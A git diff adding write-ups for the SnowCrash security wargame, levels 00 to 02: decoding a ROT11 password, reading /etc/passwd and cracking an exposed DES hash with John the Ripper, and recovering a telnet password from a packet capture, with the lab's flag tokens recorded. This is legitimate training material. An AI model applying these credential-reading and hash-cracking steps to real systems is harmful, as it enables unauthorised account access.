diff --git a/snowcrash/.gitignore b/snowcrash/.gitignore new file mode 100644 index 0000000..e0643db --- /dev/null +++ b/snowcrash/.gitignore @@ -0,0 +1,2 @@ +.dl/ +files/ diff --git a/snowcrash/level00/README.md b/snowcrash/level00/README.md new file mode 100644 index 0000000..8e2cbd0 --- /dev/null +++ b/snowcrash/level00/README.md @@ -0,0 +1,77 @@ +# Level 00 + +## how to login + +username: level00 + +password: level00 + +## Goal + +run `getflag` as user `flag00` + +## Actually doing something + +When logging in, nothing to see + +```sh +level00@SnowCrash:~$ ls -la . +total 12 +dr-xr-x---+ 1 level00 level00 100 Mar 5 2016 . +d--x--x--x 1 root users 340 Aug 30 2015 .. +-r-xr-x---+ 1 level00 level00 220 Apr 3 2012 .bash_logout +-r-xr-x---+ 1 level00 level00 3518 Aug 30 2015 .bashrc +-r-xr-x---+ 1 level00 level00 675 Apr 3 2012 .profile +``` + +Trying to find anything to do: + +```sh +level00@SnowCrash:~$ find / -user flag00 -print 2>/dev/null +/usr/sbin/john +/rofs/usr/sbin/john +``` + +The `/rofs` seems to be a read only version of the root (`/`), meaning that we dont really care about it + +running `file` on `/usr/sbin/john` says that it is an ASCII file +lets open it + +```bash +level00@SnowCrash:~$ cat /usr/sbin/john +cdiiddwpgswtgt +``` + +lets also confirm that the `/usr/sbin/john` and `/rofs/usr/sbin/john` is the same + +```bash +level00@SnowCrash:~$ sha256sum /rofs/usr/sbin/john /usr/sbin/john +c36e744787ff060c5711ac4b5d06439a9f265169fb82946a8d1052f4a935103e /rofs/usr/sbin/john +c36e744787ff060c5711ac4b5d06439a9f265169fb82946a8d1052f4a935103e /usr/sbin/john +``` + +They are indeed the same. I have fiddled with the iso itself, and it uses a readonly filesytem to store everything, +so this seems to be how they still have some kind of "normal" system + +We now have something that looks like it wants us poke at it (the text). +The file itself isn't executable (even if it is in `/usr/sbin/`) + +Cyberchef is a nice tool to fiddle with random ciffers, so lets have fun :D +link: [https://cyberchef.org/](https://cyberchef.org/) + +After having fun with the website, we can see that with a ROT11 (also named Caesar substitution), we find some english text: +``` +nottoohardhere +``` + +is it the password of the user `flag00` ? + +```bash +level00@SnowCrash:~$ su flag00 +Password: +Don't forget to launch getflag ! +flag00@SnowCrash:~$ getflag +Check flag.Here is your token : x24ti5gi3x0ol2eh4esiuxias +``` + +yes it is ! diff --git a/snowcrash/level00/flag b/snowcrash/level00/flag new file mode 100644 index 0000000..d44c8a1 --- /dev/null +++ b/snowcrash/level00/flag @@ -0,0 +1 @@ +x24ti5gi3x0ol2eh4esiuxias diff --git a/snowcrash/level00/passwd b/snowcrash/level00/passwd new file mode 100644 index 0000000..73d00e7 --- /dev/null +++ b/snowcrash/level00/passwd @@ -0,0 +1 @@ +level00 diff --git a/snowcrash/level01/README.md b/snowcrash/level01/README.md new file mode 100644 index 0000000..716b2a3 --- /dev/null +++ b/snowcrash/level01/README.md @@ -0,0 +1,87 @@ +# Level 01 + +## how to login + +username: level01 + +password: x24ti5gi3x0ol2eh4esiuxias + +## Goal + +run `getflag` as user `flag01` + +## Actually doing something + +Again lets check around + +```bash +level01@SnowCrash:~$ ls -la +total 12 +dr-x------ 1 level01 level01 100 Mar 5 2016 . +d--x--x--x 1 root users 340 Aug 30 2015 .. +-r-x------ 1 level01 level01 220 Apr 3 2012 .bash_logout +-r-x------ 1 level01 level01 3518 Aug 30 2015 .bashrc +-r-x------ 1 level01 level01 675 Apr 3 2012 .profile +``` + +nothing to see again, the file present are the default files on Ubuntu 12.04 + +lets try to find anything to do +```bash +level01@SnowCrash:~$ find / -user flag01 -print 2>/dev/null +level01@SnowCrash:~$ +``` + +Right... nothing to see here + +So after looking around, the file `/etc/passwd` looks juicy: it has an password hash for the user flag02 +```bash +level01@ShowCrash:~$ cat /etc/passwd +[...snip...] +level13:x:2013:2013::/home/user/level13:/bin/bash +level14:x:2014:2014::/home/user/level14:/bin/bash +flag00:x:3000:3000::/home/flag/flag00:/bin/bash +flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash +flag02:x:3002:3002::/home/flag/flag02:/bin/bash +flag03:x:3003:3003::/home/flag/flag03:/bin/bash +flag04:x:3004:3004::/home/flag/flag04:/bin/bash +flag05:x:3005:3005::/home/flag/flag05:/bin/bash +[...snip...] +``` + +When looking at this, you might think that all the other users also have their password hash in here +(and that they share the same password because the hash is `x`) +but actually `x` means that the actual hash is located in the shadow file (`/etc/shadow`) +The shadow file is not readable, so we can't get those hashes. Only the user `flag01` has his password hash +readable by other users + +it seems that the first level was an hint to use john the ripper, a program made to crack hashes +after installing it on my host computer (thanks nix), running it is very simple +```bash +❯ echo "42hDRfypTqqnw" >hashfile +❯ john hashfile +Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl" +Use the "--format=descrypt-opencl" option to force loading these as that type instead +Using default input encoding: UTF-8 +Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2]) +Will run 12 OpenMP threads +Proceeding with single, rules:Single +Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status +Almost done: Processing the remaining buffered candidate passwords, if any. +Proceeding with wordlist:/nix/store/yq1921vpkb03aj2hxrwbczb72p2kk5wm-john-rolling-2404/share/john/password.lst +Enabling duplicate candidate password suppressor +abcdefg (?) +1g 0:00:00:00 DONE 2/3 (2026-01-19 14:38) 3.704g/s 273066p/s 273066c/s 273066C/s 123456..gravitat +Use the "--show" option to display all of the cracked passwords reliably +Session completed. +``` + +so it has found an string that give the same hash. Just to be pedantic, +this can be a different string from what the user typed when setting their password, but it provide the same hash so it works + +lets try it +```bash +level01@SnowCrash:~$ su flag01 -c getflag +Password: +Check flag.Here is your token : f2av5il02puano7naaf6adaaf +``` diff --git a/snowcrash/level01/flag b/snowcrash/level01/flag new file mode 100644 index 0000000..08efa4d --- /dev/null +++ b/snowcrash/level01/flag @@ -0,0 +1 @@ +f2av5il02puano7naaf6adaaf diff --git a/snowcrash/level01/passwd b/snowcrash/level01/passwd new file mode 100644 index 0000000..d44c8a1 --- /dev/null +++ b/snowcrash/level01/passwd @@ -0,0 +1 @@ +x24ti5gi3x0ol2eh4esiuxias diff --git a/snowcrash/level02/README.md b/snowcrash/level02/README.md new file mode 100644 index 0000000..9d72be5 --- /dev/null +++ b/snowcrash/level02/README.md @@ -0,0 +1,300 @@ +# Level 02 + +## how to login + +username: level02 + +password: f2av5il02puano7naaf6adaaf + +## Goal + +run `getflag` as user `flag02` + +## Actually doing something + +as always: + +```bash +level02@SnowCrash:~$ ll +total 24 +dr-x------ 1 level02 level02 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level02 level02 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level02 level02 3518 Aug 30 2015 .bashrc* +----r--r-- 1 flag02 level02 8302 Aug 30 2015 level02.pcap +-r-x------ 1 level02 level02 675 Apr 3 2012 .profile* +``` + +we have a new one ! + +lets try to find what this .pcap file is actually + +```bash +level02@SnowCrash:~$ file level02.pcap +level02.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 16777216) +``` + +seems like a job for wireshark ! +#### What is wireshark ? + +Wireshark is a program that allows the user to look at network (and a lot of other stuff) packets, with alot of information +It can try to parse packets, show you information and is overhall VERY USERFULL to understand what is happening + +#### Using Wireshark + +We can load the capture file into wireshark, and then we get presented with a list of packets. + +```bash +❯ nix run nixpkgs\#wireshark-cli -- -r ./level02.pcap + 1 0.000000 59.233.235.218 → 59.233.235.223 TCP 74 39247 → 12121 [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM TSval=18592800 TSecr=0 WS=128 + 2 0.000128 59.233.235.223 → 59.233.235.218 TCP 74 12121 → 39247 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM TSval=46280417 TSecr=18592800 WS=32 + 3 0.000390 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=1 Ack=1 Win=14720 Len=0 TSval=18592800 TSecr=46280417 + 4 0.036008 59.233.235.223 → 59.233.235.218 TCP 69 12121 → 39247 [PSH, ACK] Seq=1 Ack=1 Win=14496 Len=3 TSval=46280426 TSecr=18592800 + 5 0.036255 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=1 Ack=4 Win=14720 Len=0 TSval=18592804 TSecr=46280426 + 6 0.036276 59.233.235.218 → 59.233.235.223 TCP 69 39247 → 12121 [PSH, ACK] Seq=1 Ack=4 Win=14720 Len=3 TSval=18592804 TSecr=46280426 + 7 0.036396 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=4 Ack=4 Win=14496 Len=0 TSval=46280426 TSecr=18592804 + 8 0.036581 59.233.235.223 → 59.233.235.218 TCP 84 12121 → 39247 [PSH, ACK] Seq=4 Ack=4 Win=14496 Len=18 TSval=46280426 TSecr=18592804 + 9 0.036698 59.233.235.218 → 59.233.235.223 TCP 84 39247 → 12121 [PSH, ACK] Seq=4 Ack=22 Win=14720 Len=18 TSval=18592804 TSecr=46280426 + 10 0.036859 59.233.235.223 → 59.233.235.218 TCP 90 12121 → 39247 [PSH, ACK] Seq=22 Ack=22 Win=14496 Len=24 TSval=46280426 TSecr=18592804 + 11 0.037039 59.233.235.218 → 59.233.235.223 TCP 133 39247 → 12121 [PSH, ACK] Seq=22 Ack=46 Win=14720 Len=67 TSval=18592804 TSecr=46280426 + 12 0.039170 59.233.235.223 → 59.233.235.218 TCP 84 12121 → 39247 [PSH, ACK] Seq=46 Ack=89 Win=14496 Len=18 TSval=46280427 TSecr=18592804 + 13 0.039392 59.233.235.218 → 59.233.235.223 TCP 140 39247 → 12121 [PSH, ACK] Seq=89 Ack=64 Win=14720 Len=74 TSval=18592804 TSecr=46280427 + 14 0.039704 59.233.235.223 → 59.233.235.218 TCP 73 12121 → 39247 [PSH, ACK] Seq=64 Ack=163 Win=14496 Len=7 TSval=46280427 TSecr=18592804 + 15 0.039842 59.233.235.218 → 59.233.235.223 TCP 73 39247 → 12121 [PSH, ACK] Seq=163 Ack=71 Win=14720 Len=7 TSval=18592804 TSecr=46280427 + 16 0.040138 59.233.235.223 → 59.233.235.218 TCP 81 12121 → 39247 [PSH, ACK] Seq=71 Ack=170 Win=14496 Len=15 TSval=46280427 TSecr=18592804 + 17 0.040277 59.233.235.218 → 59.233.235.223 TCP 75 39247 → 12121 [PSH, ACK] Seq=170 Ack=86 Win=14720 Len=9 TSval=18592804 TSecr=46280427 + 18 0.040450 59.233.235.223 → 59.233.235.218 TCP 107 12121 → 39247 [PSH, ACK] Seq=86 Ack=179 Win=14496 Len=41 TSval=46280427 TSecr=18592804 + 19 0.071743 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=179 Ack=127 Win=14720 Len=0 TSval=18592808 TSecr=46280427 + 20 0.071825 59.233.235.223 → 59.233.235.218 TCP 141 12121 → 39247 [PSH, ACK] Seq=127 Ack=179 Win=14496 Len=75 TSval=46280435 TSecr=18592808 + 21 0.071976 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=179 Ack=202 Win=14720 Len=0 TSval=18592808 TSecr=46280435 + 22 12.223886 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=179 Ack=202 Win=14720 Len=1 TSval=18594023 TSecr=46280435 + 23 12.229432 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=202 Ack=180 Win=14496 Len=2 TSval=46283475 TSecr=18594023 + 24 12.229592 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=180 Ack=204 Win=14720 Len=0 TSval=18594023 TSecr=46283475 + 25 12.323890 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=180 Ack=204 Win=14720 Len=1 TSval=18594033 TSecr=46283475 + 26 12.329436 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=204 Ack=181 Win=14496 Len=2 TSval=46283500 TSecr=18594033 + 27 12.329654 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=181 Ack=206 Win=14720 Len=0 TSval=18594033 TSecr=46283500 + 28 12.553547 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=181 Ack=206 Win=14720 Len=1 TSval=18594056 TSecr=46283500 + 29 12.561397 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=206 Ack=182 Win=14496 Len=2 TSval=46283558 TSecr=18594056 + 30 12.561533 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=182 Ack=208 Win=14720 Len=0 TSval=18594056 TSecr=46283558 + 31 12.644167 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=182 Ack=208 Win=14720 Len=1 TSval=18594065 TSecr=46283558 + 32 12.649394 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=208 Ack=183 Win=14496 Len=2 TSval=46283580 TSecr=18594065 + 33 12.649527 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=183 Ack=210 Win=14720 Len=0 TSval=18594065 TSecr=46283580 + 34 12.714079 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=183 Ack=210 Win=14720 Len=1 TSval=18594072 TSecr=46283580 + 35 12.721391 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=210 Ack=184 Win=14496 Len=2 TSval=46283598 TSecr=18594072 + 36 12.721530 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=184 Ack=212 Win=14720 Len=0 TSval=18594072 TSecr=46283598 + 37 13.043928 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=184 Ack=212 Win=14720 Len=1 TSval=18594105 TSecr=46283598 + 38 13.049520 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=212 Ack=185 Win=14496 Len=2 TSval=46283680 TSecr=18594105 + 39 13.049762 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=185 Ack=214 Win=14720 Len=0 TSval=18594105 TSecr=46283680 + 40 13.823856 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=185 Ack=214 Win=14720 Len=1 TSval=18594183 TSecr=46283680 + 41 13.827303 59.233.235.223 → 59.233.235.218 TCP 67 12121 → 39247 [PSH, ACK] Seq=214 Ack=186 Win=14496 Len=1 TSval=46283874 TSecr=18594183 + 42 13.827557 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=186 Ack=215 Win=14720 Len=0 TSval=18594183 TSecr=46283874 + 43 13.827653 59.233.235.223 → 59.233.235.218 TCP 79 12121 → 39247 [PSH, ACK] Seq=215 Ack=186 Win=14496 Len=13 TSval=46283874 TSecr=18594183 + 44 13.827763 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=186 Ack=228 Win=14720 Len=0 TSval=18594183 TSecr=46283874 + 45 22.095852 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=186 Ack=228 Win=14720 Len=1 TSval=18595010 TSecr=46283874 + 46 22.133398 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=187 Win=14496 Len=0 TSval=46285951 TSecr=18595010 + 47 22.985487 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=187 Ack=228 Win=14720 Len=1 TSval=18595099 TSecr=46285951 + 48 22.985568 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=188 Win=14496 Len=0 TSval=46286164 TSecr=18595099 + 49 23.605835 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=188 Ack=228 Win=14720 Len=1 TSval=18595161 TSecr=46286164 + 50 23.605906 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=189 Win=14496 Len=0 TSval=46286319 TSecr=18595161 + 51 24.076245 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=189 Ack=228 Win=14720 Len=1 TSval=18595208 TSecr=46286319 + 52 24.076322 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=190 Win=14496 Len=0 TSval=46286436 TSecr=18595208 + 53 24.306019 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=190 Ack=228 Win=14720 Len=1 TSval=18595231 TSecr=46286436 + 54 24.306080 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=191 Win=14496 Len=0 TSval=46286494 TSecr=18595231 + 55 24.535764 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=191 Ack=228 Win=14720 Len=1 TSval=18595254 TSecr=46286494 + 56 24.535825 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=192 Win=14496 Len=0 TSval=46286551 TSecr=18595254 + 57 24.675695 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=192 Ack=228 Win=14720 Len=1 TSval=18595268 TSecr=46286551 + 58 24.675752 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=193 Win=14496 Len=0 TSval=46286586 TSecr=18595268 + 59 25.016142 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=193 Ack=228 Win=14720 Len=1 TSval=18595302 TSecr=46286586 + 60 25.016217 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=194 Win=14496 Len=0 TSval=46286671 TSecr=18595302 + 61 26.596535 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=194 Ack=228 Win=14720 Len=1 TSval=18595460 TSecr=46286671 + 62 26.596615 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=195 Win=14496 Len=0 TSval=46287066 TSecr=18595460 + 63 26.966369 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=195 Ack=228 Win=14720 Len=1 TSval=18595497 TSecr=46287066 + 64 26.966450 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=196 Win=14496 Len=0 TSval=46287159 TSecr=18595497 + 65 27.336798 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=196 Ack=228 Win=14720 Len=1 TSval=18595534 TSecr=46287159 + 66 27.336848 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=197 Win=14496 Len=0 TSval=46287251 TSecr=18595534 + 67 28.106976 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=197 Ack=228 Win=14720 Len=1 TSval=18595611 TSecr=46287251 + 68 28.107054 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=198 Win=14496 Len=0 TSval=46287444 TSecr=18595611 + 69 28.306873 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=198 Ack=228 Win=14720 Len=1 TSval=18595631 TSecr=46287444 + 70 28.306942 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=199 Win=14496 Len=0 TSval=46287494 TSecr=18595631 + 71 29.996885 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=199 Ack=228 Win=14720 Len=1 TSval=18595800 TSecr=46287494 + 72 29.996963 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=200 Win=14496 Len=0 TSval=46287916 TSecr=18595800 + 73 31.307388 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=200 Ack=228 Win=14720 Len=1 TSval=18595931 TSecr=46287916 + 74 31.307470 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=201 Win=14496 Len=0 TSval=46288244 TSecr=18595931 + 75 31.747118 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=201 Ack=228 Win=14720 Len=1 TSval=18595975 TSecr=46288244 + 76 31.747176 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=202 Win=14496 Len=0 TSval=46288354 TSecr=18595975 + 77 32.367715 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=202 Ack=228 Win=14720 Len=1 TSval=18596037 TSecr=46288354 + 78 32.367798 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=203 Win=14496 Len=0 TSval=46288509 TSecr=18596037 + 79 32.537454 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=203 Ack=228 Win=14720 Len=1 TSval=18596054 TSecr=46288509 + 80 32.537506 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=204 Win=14496 Len=0 TSval=46288552 TSecr=18596054 + 81 32.807373 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=204 Ack=228 Win=14720 Len=1 TSval=18596081 TSecr=46288552 + 82 32.807426 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=205 Win=14496 Len=0 TSval=46288619 TSecr=18596081 + 83 32.837328 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=205 Ack=228 Win=14720 Len=1 TSval=18596084 TSecr=46288619 + 84 32.837382 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=206 Win=14496 Len=0 TSval=46288626 TSecr=18596084 + 85 33.697667 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=206 Ack=228 Win=14720 Len=1 TSval=18596170 TSecr=46288626 + 86 33.697744 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=207 Win=14496 Len=0 TSval=46288842 TSecr=18596170 + 87 33.705420 59.233.235.223 → 59.233.235.218 TCP 69 12121 → 39247 [PSH, ACK] Seq=228 Ack=207 Win=14496 Len=3 TSval=46288844 TSecr=18596170 + 88 33.705616 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=231 Win=14720 Len=0 TSval=18596170 TSecr=46288844 + 89 36.462504 59.233.235.223 → 59.233.235.218 TCP 67 12121 → 39247 [PSH, ACK] Seq=231 Ack=207 Win=14496 Len=1 TSval=46289533 TSecr=18596170 + 90 36.462761 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=232 Win=14720 Len=0 TSval=18596446 TSecr=46289533 + 91 36.462858 59.233.235.223 → 59.233.235.218 TCP 101 12121 → 39247 [PSH, ACK] Seq=232 Ack=207 Win=14496 Len=35 TSval=46289533 TSecr=18596446 + 92 36.463013 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=267 Win=14720 Len=0 TSval=18596446 TSecr=46289533 + 93 42.109464 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [FIN, ACK] Seq=207 Ack=267 Win=14720 Len=0 TSval=18597011 TSecr=46289533 + 94 42.110028 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [FIN, ACK] Seq=267 Ack=208 Win=14496 Len=0 TSval=46290945 TSecr=18597011 + 95 42.110236 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=208 Ack=268 Win=14720 Len=0 TSval=18597011 TSecr=46290945 +``` + +So yeah... Tcp is not a nice protocol to look at if you don't know anything + +Looking at packets by hand in the gui, I can see some ASCII text +```plain +$'E@@A;;/YOtK +.( +Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10) + +wwwbugs login: +``` + +Wireshark as a way to see the "total" TCP converstation +We *could* do it by hand, copying every "data" section and pasting it into a single file, but why do it when wireshare does it better + +If we do that, we get an nicely formatted stuff + +```hexdump + 00000000 ff fd 25 ..% +00000000 ff fc 25 ..% + 00000003 ff fb 26 ff fd 18 ff fd 20 ff fd 23 ff fd 27 ff ..&..... ..#..'. + 00000013 fd 24 .$ +00000003 ff fe 26 ff fb 18 ff fb 20 ff fb 23 ff fb 27 ff ..&..... ..#..'. +00000013 fc 24 .$ + 00000015 ff fa 20 01 ff f0 ff fa 23 01 ff f0 ff fa 27 01 .. ..... #.....'. + 00000025 ff f0 ff fa 18 01 ff f0 ........ +00000015 ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff .. .3840 0,38400. +00000025 f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0 ...#.Sod aCan:0.. +00000035 ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64 ..'..DIS PLAY.Sod +00000045 61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72 aCan:0.. ....xter +00000055 6d ff f0 m.. + 0000002D ff fb 03 ff fd 01 ff fd 22 ff fd 1f ff fb 05 ff ........ "....... + 0000003D fd 21 .! +00000058 ff fd 03 ff fc 01 ff fb 22 ff fa 22 03 01 00 00 ........ "..".... +00000068 03 62 03 04 02 0f 05 00 00 07 62 1c 08 02 04 09 .b...... ..b..... +00000078 42 1a 0a 02 7f 0b 02 15 0f 02 11 10 02 13 11 02 B....... ........ +00000088 ff ff 12 02 ff ff ff f0 ff fb 1f ff fa 1f 00 b1 ........ ........ +00000098 00 31 ff f0 ff fd 05 ff fb 21 .1...... .! + 0000003F ff fa 22 01 03 ff f0 ..".... +000000A2 ff fa 22 01 07 ff f0 ..".... + 00000046 ff fa 21 03 ff f0 ff fb 01 ff fd 00 ff fe 22 ..!..... ......" +000000A9 ff fd 01 ff fb 00 ff fc 22 ........ " + 00000055 ff fa 22 03 03 e2 03 04 82 0f 07 e2 1c 08 82 04 .."..... ........ + 00000065 09 c2 1a 0a 82 7f 0b 82 15 0f 82 11 10 82 13 11 ........ ........ + 00000075 82 ff ff 12 82 ff ff ff f0 ........ . + 0000007E 0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38 ..Linux 2.6.38-8 + 0000008E 2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a -generic -pae (:: + 0000009E 66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28 ffff:10. 1.1.2) ( + 000000AE 70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62 pts/10). ....wwwb + 000000BE 75 67 73 20 6c 6f 67 69 6e 3a 20 ugs logi n: +000000B2 6c l + 000000C9 00 6c .l +000000B3 65 e + 000000CB 00 65 .e +000000B4 76 v + 000000CD 00 76 .v +000000B5 65 e + 000000CF 00 65 .e +000000B6 6c l + 000000D1 00 6c .l +000000B7 58 X + 000000D3 00 58 .X +000000B8 0d . + 000000D5 01 . + 000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord: +000000B9 66 f +000000BA 74 t +000000BB 5f _ +000000BC 77 w +000000BD 61 a +000000BE 6e n +000000BF 64 d +000000C0 72 r +000000C1 7f . +000000C2 7f . +000000C3 7f . +000000C4 4e N +000000C5 44 D +000000C6 52 R +000000C7 65 e +000000C8 6c l +000000C9 7f . +000000CA 4c L +000000CB 30 0 +000000CC 4c L +000000CD 0d . + 000000E3 00 0d 0a ... + 000000E6 01 . + 000000E7 00 0d 0a 4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 ...Login incorre + 000000F7 63 74 0d 0a 77 77 77 62 75 67 73 20 6c 6f 67 69 ct..wwwb ugs logi + 00000107 6e 3a 20 n: +``` + +This looks a bit annoying, but if we remove the hexdump stuff, and keep only the ascii (non ascii are represneted by `.` )characters, we get this + +``` +> ..% +< ..% +> ..&..... ..#..'..$ +< ..&..... ..#..'..$ +> .. .....#.....'......... +< .. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.. +> ........"........! +< ........"..".....b........b.... B. +< ..............................1.......! +> ..".... +< ..".... +> ..!..........." +< ........" +> .."............. .. +> ..................... +> Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10) + +> ..wwwbugs login: +< l +> .l +< e +> .e +< v +> .v +< e +> .e +< l +> .l +< X +> .X + + +> .. +> Password: +< ft_wandr...NDRel.L0L + +> . +> .. +> Login incorrect +> wwwbugs login: +``` + +(Legend: `<` means client send this to the server and `>` means the server sent this to the client. any `.` may represent an non-ascii/non-character byte) + +We see a nice `Passowrd:` sent by the server, with a nice response of `ft_wandr...NDRel.L0L`. + +While looking at the hexdump, we can decipher what the `.` are truly representing +as a C string it looks like this `"ft_wandr\x7f\x7f\x7fNDRel\x7fL0L"` + +a quick `man ascii` reveal that `\x7f` is the `DEL` character. +Assuming this means that mister Wandre failed to type is password, corrected it, and sent it, it would be +`ft_waNDReL0L` + +```bash +level02@SnowCrash:~$ su flag02 -c getflag +Password: +Check flag.Here is your token : kooda2puivaav1idi4f57q8iq +``` + + diff --git a/snowcrash/level02/flag b/snowcrash/level02/flag new file mode 100644 index 0000000..e69de29 diff --git a/snowcrash/level02/passwd 